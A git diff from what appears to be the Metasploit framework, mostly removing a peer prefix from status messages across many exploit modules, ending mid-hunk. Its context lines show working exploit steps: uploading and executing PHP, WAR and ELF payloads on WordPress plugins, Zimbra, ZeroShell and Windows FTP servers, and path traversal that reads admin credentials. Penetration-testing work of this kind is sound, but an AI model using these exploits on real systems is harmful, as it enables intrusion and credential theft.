a/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb b/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb index f683aa071f..6b7a2c30b9 100644 --- a/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb +++ b/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb @@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Preparing payload") + print_status("Preparing payload") unique_name = Rex::Text.rand_text_alpha(10) payload_name = "#{unique_name}.php" symposium_url = normalize_uri(wordpress_url_plugins, 'wp-symposium', 'server', 'php') @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote data = generate_mime_message(payload, payload_name, unique_name, symposium_url) symposium_url = normalize_uri(symposium_url, 'index.php') - print_status("#{peer} - Uploading payload to #{payload_url}") + print_status("Uploading payload to #{payload_url}") res = send_request_cgi( 'method' => 'POST', 'uri' => symposium_url, @@ -74,22 +74,22 @@ class Metasploit3 < Msf::Exploit::Remote ) if res && res.code == 200 && res.body.length > 0 && !res.body.include?('error') && res.body != '0' - print_good("#{peer} - Uploaded the payload") + print_good("Uploaded the payload") register_files_for_cleanup(payload_name) - print_status("#{peer} - Executing the payload...") + print_status("Executing the payload...") send_request_cgi( { 'uri' => payload_url, 'method' => 'GET' }, 5) - print_good("#{peer} - Executed payload") + print_good("Executed payload") else if res.nil? fail_with(Failure::Unreachable, "No response from the target") else - vprint_error("#{peer} - HTTP Status: #{res.code}") - vprint_error("#{peer} - Server returned: #{res.body}") + vprint_error("HTTP Status: #{res.code}") + vprint_error("Server returned: #{res.body}") fail_with(Failure::UnexpectedReply, "Failed to upload the payload") end end diff --git a/modules/exploits/unix/webapp/wp_total_cache_exec.rb b/modules/exploits/unix/webapp/wp_total_cache_exec.rb index a38a65f0f1..bcf6911d2b 100644 --- a/modules/exploits/unix/webapp/wp_total_cache_exec.rb +++ b/modules/exploits/unix/webapp/wp_total_cache_exec.rb @@ -106,44 +106,44 @@ class Metasploit3 < Msf::Exploit::Remote @auth = require_auth? if @auth - print_status("#{peer} - Trying to login...") + print_status("Trying to login...") @cookie = wordpress_login(@user, @password) if @cookie.nil? fail_with(Failure::NoAccess, "#{peer} - Login wasn't successful") end - print_status("#{peer} - login successful") + print_status("login successful") else - print_status("#{peer} - Trying unauthenticated exploitation...") + print_status("Trying unauthenticated exploitation...") end if datastore['POSTID'] and datastore['POSTID'] != 0 @post_id = datastore['POSTID'] - print_status("#{peer} - Using the user supplied POST ID #{@post_id}...") + print_status("Using the user supplied POST ID #{@post_id}...") else - print_status("#{peer} - Trying to get posts from feed...") + print_status("Trying to get posts from feed...") all_posts = wordpress_get_all_blog_posts_via_feed # First try all blog posts provided by feed if all_posts all_posts.each do |p| - vprint_status("#{peer} - Checking #{p}...") + vprint_status("Checking #{p}...") enabled = wordpress_post_comments_enabled?(p, @cookie) @post_id = get_post_id_from_body(enabled) if @post_id - print_status("#{peer} - Found Post POST ID #{@post_id}...") + print_status("Found Post POST ID #{@post_id}...") break end end end # if nothing found, bruteforce a post id unless @post_id - print_status("#{peer} - Nothing found. Trying to brute force a valid POST ID...") + print_status("Nothing found. Trying to brute force a valid POST ID...") min_post_id = datastore['MIN_POST_ID'] max_post_id = datastore['MAX_POST_ID'] @post_id = wordpress_bruteforce_valid_post_id_with_comments_enabled(min_post_id, max_post_id, @cookie) if @post_id.nil? fail_with(Failure::BadConfig, "#{peer} - Unable to post without a valid POST ID where comment") else - print_status("#{peer} - Using the brute forced POST ID #{@post_id}...") + print_status("Using the brute forced POST ID #{@post_id}...") end end end @@ -151,14 +151,14 @@ class Metasploit3 < Msf::Exploit::Remote random_test = rand_text_alpha(64) @sum = Rex::Text.sha1(random_test) - print_status("#{peer} - Injecting the PHP Code in a comment...") + print_status("Injecting the PHP Code in a comment...") text = Rex::Text::rand_text_alpha(10) post_uri = post_comment(text) if post_uri.nil? fail_with(Failure::Unknown, "#{peer} - Expected redirection not returned") end - print_status("#{peer} - Executing the payload...") + print_status("Executing the payload...") options = { 'method' => 'GET', 'uri' => post_uri, diff --git a/modules/exploits/unix/webapp/wp_worktheflow_upload.rb b/modules/exploits/unix/webapp/wp_worktheflow_upload.rb index cba67e8185..ff0f1b3644 100644 --- a/modules/exploits/unix/webapp/wp_worktheflow_upload.rb +++ b/modules/exploits/unix/webapp/wp_worktheflow_upload.rb @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote if res if res.code == 200 - print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...") + print_good("Our payload is at: #{php_pagename}. Calling payload...") register_files_for_cleanup(php_pagename) else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, 'ERROR') end - print_status("#{peer} - Calling payload...") + print_status("Calling payload...") send_request_cgi( 'uri' => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets', 'jQuery-File-Upload-9.5.0', 'server', 'php', 'files', php_pagename) diff --git a/modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb b/modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb index d51f8957e1..f4cd2947c3 100644 --- a/modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote if res if res.code == 200 && res.body =~ /#{php_page_name}/ - print_good("#{peer} - Payload uploaded as #{php_page_name}") + print_good("Payload uploaded as #{php_page_name}") register_files_for_cleanup(php_page_name) else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Server did not answer") end - print_status("#{peer} - Calling payload...") + print_status("Calling payload...") send_request_cgi( { 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', php_page_name) }, 5 diff --git a/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb b/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb index 5643f7fef8..b9077a1de7 100644 --- a/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote # forward to profile.php or other page? if res && res.redirect? && res.redirection location = res.redirection - print_status("#{peer} - Following redirect to #{location}") + print_status("Following redirect to #{location}") res = send_request_cgi( 'uri' => location, 'method' => 'GET', @@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part(nonce, nil, nil, 'form-data; name="wp_nonce"') post_data = data.to_s - print_status("#{peer} - Uploading payload") + print_status("Uploading payload") res = send_request_cgi( 'method' => 'POST', 'uri' => wordpress_url_admin_ajax, @@ -117,29 +117,29 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to login as #{user}") + print_status("Trying to login as #{user}") cookie = wordpress_login(user, password) if cookie.nil? - print_error("#{peer} - Unable to login as #{user}") + print_error("Unable to login as #{user}") return end - print_status("#{peer} - Trying to get nonce") + print_status("Trying to get nonce") nonce = get_nonce(cookie) if nonce.nil? - print_error("#{peer} - Can not get nonce after login") + print_error("Can not get nonce after login") return end - print_status("#{peer} - Got nonce #{nonce}") + print_status("Got nonce #{nonce}") - print_status("#{peer} - Trying to upload payload") + print_status("Trying to upload payload") file_path = upload_file(cookie, nonce) if file_path.nil? - print_error("#{peer} - Error uploading file") + print_error("Error uploading file") return end - print_status("#{peer} - Calling uploaded file #{file_path}") + print_status("Calling uploaded file #{file_path}") send_request_cgi( 'uri' => file_path, 'method' => 'GET' diff --git a/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb b/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb index e48bbf5a9d..e12dd578c5 100644 --- a/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb +++ b/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb @@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote payload_uri = normalize_uri(target_uri.path, wp_content_dir, 'uploads', 'wysija', 'themes', theme_name, payload_name) - print_status("#{peer} - Uploading payload to #{payload_uri}") + print_status("Uploading payload to #{payload_uri}") res = send_request_cgi( 'method' => 'POST', 'uri' => wordpress_url_admin_post, @@ -108,9 +108,9 @@ class Metasploit3 < Msf::Exploit::Remote # the theme folder (manual cleanup) register_files_for_cleanup('style.css', payload_name) - print_warning("#{peer} - The theme folder #{theme_name} can not be removed. Please delete it manually.") + print_warning("The theme folder #{theme_name} can not be removed. Please delete it manually.") - print_status("#{peer} - Executing payload #{payload_uri}") + print_status("Executing payload #{payload_uri}") send_request_cgi( 'uri' => payload_uri, 'method' => 'GET' diff --git a/modules/exploits/unix/webapp/xoda_file_upload.rb b/modules/exploits/unix/webapp/xoda_file_upload.rb index 410ba14ceb..1a4f6f9ab5 100644 --- a/modules/exploits/unix/webapp/xoda_file_upload.rb +++ b/modules/exploits/unix/webapp/xoda_file_upload.rb @@ -101,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data << "\r\n" post_data << "--#{boundary}--\r\n" - print_status("#{peer} - Sending PHP payload (#{@payload_name})") + print_status("Sending PHP payload (#{@payload_name})") res = send_request_cgi({ 'method' => 'POST', 'uri' => "#{uri}?upload", @@ -110,11 +110,11 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res or res.code != 302 - print_error("#{peer} - File wasn't uploaded, aborting!") + print_error("File wasn't uploaded, aborting!") return end - print_status("#{peer} - Executing PHP payload (#{@payload_name})") + print_status("Executing PHP payload (#{@payload_name})") # Execute our payload res = send_request_cgi({ @@ -125,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. Print the status code for debugging purposes. if res and res.code != 200 - print_status("#{peer} - Server returned #{res.code.to_s}") + print_status("Server returned #{res.code.to_s}") end end diff --git a/modules/exploits/unix/webapp/zeroshell_exec.rb b/modules/exploits/unix/webapp/zeroshell_exec.rb index 2fb30b494a..6af43f873a 100644 --- a/modules/exploits/unix/webapp/zeroshell_exec.rb +++ b/modules/exploits/unix/webapp/zeroshell_exec.rb @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # Check version - print_status("#{peer} - Trying to detect ZeroShell") + print_status("Trying to detect ZeroShell") res = send_request_cgi({ 'method' => 'GET', @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote # Retrieve admin password using unauthenticated LFI def password rootpw = "../../../var/register/system/ldap/rootpw" - print_status("#{peer} - Retrieving cleartext admin password") + print_status("Retrieving cleartext admin password") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, "cgi-bin", "kerbynet"), @@ -91,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.body !~ /not found/ res.body =~ /^(.*)$/ pass = $1 - print_status("#{peer} - Password retrieved [ #{pass} ]") + print_status("Password retrieved [ #{pass} ]") return pass else return nil @@ -101,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote # Login using the retrieved password and grab the session key from the response body. def login(admin_password) - print_status("#{peer} - Log in and retrieving session key") + print_status("Log in and retrieving session key") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "cgi-bin", "kerbynet"), @@ -114,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.body =~ /STk=([a-zA-Z0-9]+)&Action/ sessionkey = $1 - print_status("#{peer} - Session key retrieved [ #{sessionkey} ]") + print_status("Session key retrieved [ #{sessionkey} ]") return sessionkey else fail_with(Failure::Unknown, "#{peer} - Retrieving session key failed!") diff --git a/modules/exploits/unix/webapp/zimbra_lfi.rb b/modules/exploits/unix/webapp/zimbra_lfi.rb index c126de0f39..0cb88957e1 100644 --- a/modules/exploits/unix/webapp/zimbra_lfi.rb +++ b/modules/exploits/unix/webapp/zimbra_lfi.rb @@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Getting login credentials...") + print_status("Getting login credentials...") res = send_traversal_query(traversal_path("conf/localconfig.xml")) unless res and res.code == 200 @@ -115,8 +115,8 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Unable to get login credentials") end - print_good("#{peer} - Got login credentials!") - print_status("#{peer} - Getting auth token...") + print_good("Got login credentials!") + print_status("Getting auth token...") soap_req = build_soap_req(zimbra_user, zimbra_pass) #lets get our hands foamy @@ -142,7 +142,7 @@ class Metasploit3 < Msf::Exploit::Remote end @cookie = "ZM_ADMIN_AUTH_TOKEN=#{auth_token}" - print_good("#{peer} - Got auth token!") + print_good("Got auth token!") #the initial POC for this vuln shows user creation with admin rights for the web interface, thats cool but a shell is even cooler #the web interface has a function to upload the latest version of the desktop client via /service/extension/clientUploader/upload/ @@ -156,7 +156,7 @@ class Metasploit3 < Msf::Exploit::Remote payload_elf = generate_payload_exe #upload payload - print_status("#{peer} - Uploading payload") + print_status("Uploading payload") res = upload_file(payload_name, payload_elf) unless res and res.code == 200 @@ -164,7 +164,7 @@ class Metasploit3 < Msf::Exploit::Remote end #upload jsp stager - print_status("#{peer} - Uploading jsp stager") + print_status("Uploading jsp stager") res = upload_file(stager_name, stager) unless res and res.code == 200 @@ -176,7 +176,7 @@ class Metasploit3 < Msf::Exploit::Remote "../jetty/webapps/zimbra/downloads/#{payload_name}" ) - print_status("#{peer} - Executing payload on /downloads/#{stager_name}") + print_status("Executing payload on /downloads/#{stager_name}") res = send_request_cgi({ 'uri' => normalize_uri("downloads", stager_name), diff --git a/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb b/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb index 5add6e428a..8f26104b4e 100644 --- a/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb +++ b/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote data = "action=login&view=version&username=#{user}&password=#{pass}" # login and retrieve software version - print_status("#{peer} - Authenticating as user '#{user}'") + print_status("Authenticating as user '#{user}'") begin res = send_request_cgi({ 'method' => 'POST', @@ -81,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 if res.body =~ /<title>ZM - Login<\/title>/ - vprint_error("#{peer} - Service found, but authentication failed") + vprint_error("Service found, but authentication failed") return Exploit::CheckCode::Detected elsif res.body =~ /v1.2(4\.\d+|5\.0)/ return Exploit::CheckCode::Appears @@ -90,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote end end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeoutp - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end return Exploit::CheckCode::Safe @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote command = Rex::Text.uri_encode(payload.encoded) # login - print_status("#{peer} - Authenticating as user '#{user}'") + print_status("Authenticating as user '#{user}'") begin res = send_request_cgi({ 'method' => 'POST', @@ -121,10 +121,10 @@ class Metasploit3 < Msf::Exploit::Remote rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout fail_with(Failure::Unreachable, "#{peer} - Connection failed") end - print_good("#{peer} - Authenticated successfully") + print_good("Authenticated successfully") # send payload - print_status("#{peer} - Sending payload (#{command.length} bytes)") + print_status("Sending payload (#{command.length} bytes)") begin res = send_request_cgi({ 'method' => 'POST', @@ -133,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote 'cookie' => "#{cookie}" }) if res and res.code == 200 - print_good("#{peer} - Payload sent successfully") + print_good("Payload sent successfully") else fail_with(Failure::UnexpectedReply, "#{peer} - Sending payload failed") end diff --git a/modules/exploits/unix/webapp/zpanel_username_exec.rb b/modules/exploits/unix/webapp/zpanel_username_exec.rb index 5a398002a8..fa69d395d3 100644 --- a/modules/exploits/unix/webapp/zpanel_username_exec.rb +++ b/modules/exploits/unix/webapp/zpanel_username_exec.rb @@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote def check res = send_request_raw({'uri' => normalize_uri(target_uri.path)}) if not res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return Exploit::CheckCode::Unknown end @@ -138,18 +138,18 @@ class Metasploit3 < Msf::Exploit::Remote base = target_uri.path token, sid = get_csfr_info(base) - vprint_status("#{peer} - Token=#{token}, SID=#{sid}") + vprint_status("Token=#{token}, SID=#{sid}") user_salt_cookie = login(base, token, sid) - print_good("#{peer} - Logged in as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") + print_good("Logged in as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") vars = {'module'=>'htpasswd', 'selected'=>'Selected', 'path'=>'/'} cookie = "#{sid}; #{user_salt_cookie}" token = get_csfr_info(base, '', cookie, vars)[0] - vprint_status("#{peer} - Token=#{token}, SID=#{sid}") + vprint_status("Token=#{token}, SID=#{sid}") - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") exec(base, token, sid, user_salt_cookie) end diff --git a/modules/exploits/windows/antivirus/symantec_endpoint_manager_rce.rb b/modules/exploits/windows/antivirus/symantec_endpoint_manager_rce.rb index b85a120157..376be876bb 100644 --- a/modules/exploits/windows/antivirus/symantec_endpoint_manager_rce.rb +++ b/modules/exploits/windows/antivirus/symantec_endpoint_manager_rce.rb @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Sending payload") + print_status("Sending payload") # Execute the cmdstager, max length of the commands is ~3950 execute_cmdstager({:flavor => :vbs, :linemax => 3950}) end diff --git a/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb b/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb index d215a55d1a..5822a09417 100644 --- a/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb +++ b/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb @@ -229,21 +229,21 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Leaking the JBoss deployment directory...") + print_status("Leaking the JBoss deployment directory...") jboss_path =jboss_deploy_path if jboss_path.nil? fail_with(Failure::Unknown, "#{peer} - Failed to disclose the JBoss deployment directory") end - print_status("#{peer} - Building WAR payload...") + print_status("Building WAR payload...") app_name = Rex::Text.rand_text_alpha(4 + rand(4)) war_name = "#{app_name}.war" war = payload.encoded_war({ :app_name => app_name }).to_s deploy_dir = "..#{jboss_path}" - print_status("#{peer} - Uploading WAR payload...") + print_status("Uploading WAR payload...") res = upload_war(war_name, war, deploy_dir) diff --git a/modules/exploits/windows/ftp/freefloatftp_wbem.rb b/modules/exploits/windows/ftp/freefloatftp_wbem.rb index e73e7c3d6e..ab833037cc 100644 --- a/modules/exploits/windows/ftp/freefloatftp_wbem.rb +++ b/modules/exploits/windows/ftp/freefloatftp_wbem.rb @@ -71,12 +71,12 @@ class Metasploit3 < Msf::Exploit::Remote case @stage when :exe - print_status("#{peer} - Sending executable (#{@exe.length.to_s} bytes)") + print_status("Sending executable (#{@exe.length.to_s} bytes)") cli.put(@exe) @stage = :mof when :mof - print_status("#{peer} - Sending MOF (#{@mof.length.to_s} bytes)") + print_status("Sending MOF (#{@mof.length.to_s} bytes)") cli.put(@mof) end @@ -88,28 +88,28 @@ class Metasploit3 < Msf::Exploit::Remote select(nil, nil, nil, 1) peer = "#{rhost}:#{rport}" - print_status("#{peer} - Trying to upload #{::File.basename(filename)}") + print_status("Trying to upload #{::File.basename(filename)}") conn = connect(false, datastore['VERBOSE']) - print_status("#{peer} - Sending empty login...") + print_status("Sending empty login...") res = send_user("", conn) if not res or res !~ /331/ - print_error("#{peer} - Error sending username") + print_error("Error sending username") return false end res = send_pass("", conn) if not res or res !~ /230/ - print_error("#{peer} - Error sending password") + print_error("Error sending password") return false end - print_good("#{peer} - Empty authentication was successful") + print_good("Empty authentication was successful") # Switch to binary mode - print_status("#{peer} - Set binary mode") + print_status("Set binary mode") send_cmd(['TYPE', 'I'], true, conn) # Prepare active mode: Get attacker's IP and source port @@ -121,7 +121,7 @@ class Metasploit3 < Msf::Exploit::Remote src_port = "#{src_port/256},#{src_port.remainder(256)}" # Set to active mode - print_status("#{peer} - Set active mode \"#{src_ip},#{src_port}\"") + print_status("Set active mode \"#{src_ip},#{src_port}\"") send_cmd(['PORT', "#{src_ip},#{src_port}"], true, conn) # Tell the FTP server to download our file diff --git a/modules/exploits/windows/ftp/open_ftpd_wbem.rb b/modules/exploits/windows/ftp/open_ftpd_wbem.rb index 75d677b645..53fd3231d5 100644 --- a/modules/exploits/windows/ftp/open_ftpd_wbem.rb +++ b/modules/exploits/windows/ftp/open_ftpd_wbem.rb @@ -80,11 +80,11 @@ class Metasploit3 < Msf::Exploit::Remote case @stage when :exe - print_status("#{peer} - Sending executable (#{@exe.length.to_s} bytes)") + print_status("Sending executable (#{@exe.length.to_s} bytes)") cli.put(@exe) @stage = :mof when :mof - print_status("#{peer} - Sending MOF (#{@mof.length.to_s} bytes)") + print_status("Sending MOF (#{@mof.length.to_s} bytes)") cli.put(@mof) end @@ -96,14 +96,14 @@ class Metasploit3 < Msf::Exploit::Remote select(nil, nil, nil, 1) peer = "#{rhost}:#{rport}" - print_status("#{peer} - Trying to upload #{::File.basename(filename)}") + print_status("Trying to upload #{::File.basename(filename)}") conn = connect(false, datastore['VERBOSE']) if not conn fail_with(Failure::Unreachable, "#{@peer} - Connection failed") end # Switch to binary mode - print_status("#{peer} - Set binary mode") + print_status("Set binary mode") send_cmd(['TYPE', 'I'], true, conn) # Prepare active mode: Get attacker's IP and source port @@ -115,13 +115,13 @@ class Metasploit3 < Msf::Exploit::Remote src_port = "#{src_port/256},#{src_port.remainder(256)}" # Set to active mode - print_status("#{peer} - Set active mode \"#{src_ip},#{src_port}\"") + print_status("Set active mode \"#{src_ip},#{src_port}\"") send_cmd(['PORT', "#{src_ip},#{src_port}"], true, conn) # Tell the FTP server to download our file send_cmd(['STOR', filename], false, conn) - print_good("#{peer} - Upload successful") + print_good("Upload successful") disconnect(conn) end diff --git a/modules/exploits/windows/ftp/quickshare_traversal_write.rb b/modules/exploits/windows/ftp/quickshare_traversal_write.rb index a051ee3057..043b6c2ccf 100644 --- a/modules/exploits/windows/ftp/quickshare_traversal_write.rb +++ b/modules/exploits/windows/ftp/quickshare_traversal_write.rb @@ -79,12 +79,12 @@ class Metasploit3 < Msf::Exploit::Remote case @stage when :exe - print_status("#{peer} - Sending executable (#{@exe.length.to_s} bytes)") + print_status("Sending executable (#{@exe.length.to_s} bytes)") cli.put(@exe) @stage = :mof when :mof - print_status("#{peer} - Sending MOF (#{@mof.length.to_s} bytes)") + print_status("Sending MOF (#{@mof.length.to_s} bytes)") cli.put(@mof) end @@ -96,7 +96,7 @@ class Metasploit3 < Msf::Exploit::Remote select(nil, nil, nil, 1) peer = "#{rhost}:#{rport}" - print_status("#{peer} - Trying to upload #{::File.basename(filename)}") + print_status("Trying to upload #{::File.basename(filename)}") # We can't use connect_login, because it cannot determine a successful login correctly. # For example: The server actually returns a 503 (Bad Sequence of Commands) when the @@ -106,18 +106,18 @@ class Metasploit3 < Msf::Exploit::Remote res = send_user(datastore['FTPUSER'], conn) if res !~ /^(331|2)/ - vprint_error("#{peer} - The server rejected our username: #{res.to_s}") + vprint_error("The server rejected our username: #{res.to_s}") return false end res = send_pass(datastore['FTPPASS'], conn) if res !~ /^(2|503)/ - vprint_error("#{peer} - The server rejected our password: #{res.to_s}") + vprint_error("The server rejected our password: #{res.to_s}") return false end # Switch to binary mode - print_status("#{peer} - Set binary mode") + print_status("Set binary mode") send_cmd(['TYPE', 'I'], true, conn) # Prepare active mode: Get attacker's IP and source port @@ -129,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote src_port = "#{src_port/256},#{src_port.remainder(256)}" # Set to active mode - print_status("#{peer} - Set active mode \"#{src_ip},#{src_port}\"") + print_status("Set active mode \"#{src_ip},#{src_port}\"") send_cmd(['PORT', "#{src_ip},#{src_port}"], true, conn) # Tell the FTP server to download our file diff --git a/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb b/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb index 5b80f89d7f..edefcd67a2 100644 --- a/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb +++ b/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote password = datastore['PASSWORD'] @session_cookie = authenticate(username, password) - print_status("#{peer} - Sending payload") + print_status("Sending payload") # Execute the cmdstager, max length of the commands is ~1500 execute_cmdstager(flavor: :vbs, linemax: 1500) end @@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote end def authenticate(username, password) - print_status("#{peer} - Authenticating") + print_status("Authenticating") res = send_request_cgi( 'uri' => '/admin_loginok.html', 'method' => 'POST', diff --git a/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb b/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb index ac211221c8..ee569d496f 100644 --- a/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb +++ b/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb @@ -63,9 +63,9 @@ class Metasploit3 < Msf::Exploit::Remote cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi") begin - print_warning("#{peer} - Removing #{@payload_path}") + print_warning("Removing #{@payload_path}") cli.fs.file.rm(@payload_path) - print_good("#{peer} - #{@payload_path} deleted") + print_good("#{@payload_path} deleted") rescue ::Exception => e print_error("Unable to delete #{@payload_path}: #{e.message}") end @@ -125,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote # UPLOAD # attack_url = uri_path + "CCRWebClient/Wallboard/ImageUpload.ashx" - print_status("#{peer} - Uploading #{aspx_b64.length} bytes through #{attack_url}...") + print_status("Uploading #{aspx_b64.length} bytes through #{attack_url}...") res = send_request_cgi({ 'uri' => attack_url, @@ -137,9 +137,9 @@ class Metasploit3 < Msf::Exploit::Remote payload_url = "" @payload_path = "" if res and res.code == 200 and res.body =~ /"Key":"RadUAG_success","Value":true/ - print_good("#{peer} - Payload uploaded successfuly") + print_good("Payload uploaded successfuly") else - print_error("#{peer} - Payload upload failed") + print_error("Payload upload failed") return end @@ -147,15 +147,15 @@ class Metasploit3 < Msf::Exploit::Remote if res.body =~ /\{"Key":"RadUAG_filePath","Value":"(.*)"\},\{"Key":"RadUAG_associatedData/ @payload_path = $1 - print_status("#{peer} - Payload stored on #{@payload_path}") + print_status("Payload stored on #{@payload_path}") else - print_error("#{peer} - The payload file path couldn't be retrieved") + print_error("The payload file path couldn't be retrieved") end if res.body =~ /\[\{"Key":"UploadedImageURL","Value":"(.*)"\}\]/ payload_url = URI($1).path else - print_error("#{peer} - The payload URI couldn't be retrieved... Aborting!") + print_error("The payload URI couldn't be retrieved... Aborting!") return end @@ -163,7 +163,7 @@ class Metasploit3 < Msf::Exploit::Remote # # EXECUTE # - print_status("#{peer} - Executing #{payload_url}...") + print_status("Executing #{payload_url}...") res = send_request_cgi({ 'uri' => payload_url, @@ -171,7 +171,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 20) if (!res or (res and res.code != 200)) - print_error("#{peer} - Execution failed on #{payload_url} [No Response]") + print_error("Execution failed on #{payload_url} [No Response]") return end diff --git a/modules/exploits/windows/http/cogent_datahub_command.rb b/modules/exploits/windows/http/cogent_datahub_command.rb index eab4067731..d9efe9d560 100644 --- a/modules/exploits/windows/http/cogent_datahub_command.rb +++ b/modules/exploits/windows/http/cogent_datahub_command.rb @@ -392,10 +392,10 @@ class Metasploit3 < Msf::Exploit::Remote end def primer - print_status("#{peer} - Sending injection...") + print_status("Sending injection...") res = send_injection("\\\\\\\\#{@myhost}\\\\#{@share_name}\\\\#{@basename}.dll") if res - print_error("#{peer} - Unexpected answer") + print_error("Unexpected answer") end end @@ -433,10 +433,10 @@ class Metasploit3 < Msf::Exploit::Remote host = $1 share_name = $2 dll_name = $3 - print_status("#{peer} - Sending injection...") + print_status("Sending injection...") res = send_injection("\\\\\\\\#{host}\\\\#{share_name}\\\\#{dll_name}") if res - print_error("#{peer} - Unexpected answer") + print_error("Unexpected answer") end else fail_with(Failure::BadConfig, 'Bad UNCPATH format, should be \\\\host\\shared_folder\\base_name.dll') diff --git a/modules/exploits/windows/http/cyclope_ess_sqli.rb b/modules/exploits/windows/http/cyclope_ess_sqli.rb index 14427fd950..a0747c46a7 100644 --- a/modules/exploits/windows/http/cyclope_ess_sqli.rb +++ b/modules/exploits/windows/http/cyclope_ess_sqli.rb @@ -60,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote path = File.dirname("#{target_uri.path}/.") b64_version = get_version(path) if b64_version.empty? - vprint_error("#{peer} - Unable to determine the version number") + vprint_error("Unable to determine the version number") else b64_version = Rex::Text.decode_base64(b64_version) if b64_version =~ /^[0-6]\.1/ @@ -131,11 +131,11 @@ class Metasploit3 < Msf::Exploit::Remote # b64_version = get_version(path) if b64_version.empty? - print_error("#{peer} - Unable to determine the version number") + print_error("Unable to determine the version number") return end - print_status("#{peer} - Obtained version: #{Rex::Text.decode_base64(b64_version)}") + print_status("Obtained version: #{Rex::Text.decode_base64(b64_version)}") # # Prepare our payload (naughty exe embedded in php) @@ -148,7 +148,7 @@ class Metasploit3 < Msf::Exploit::Remote # # Inject payload # - 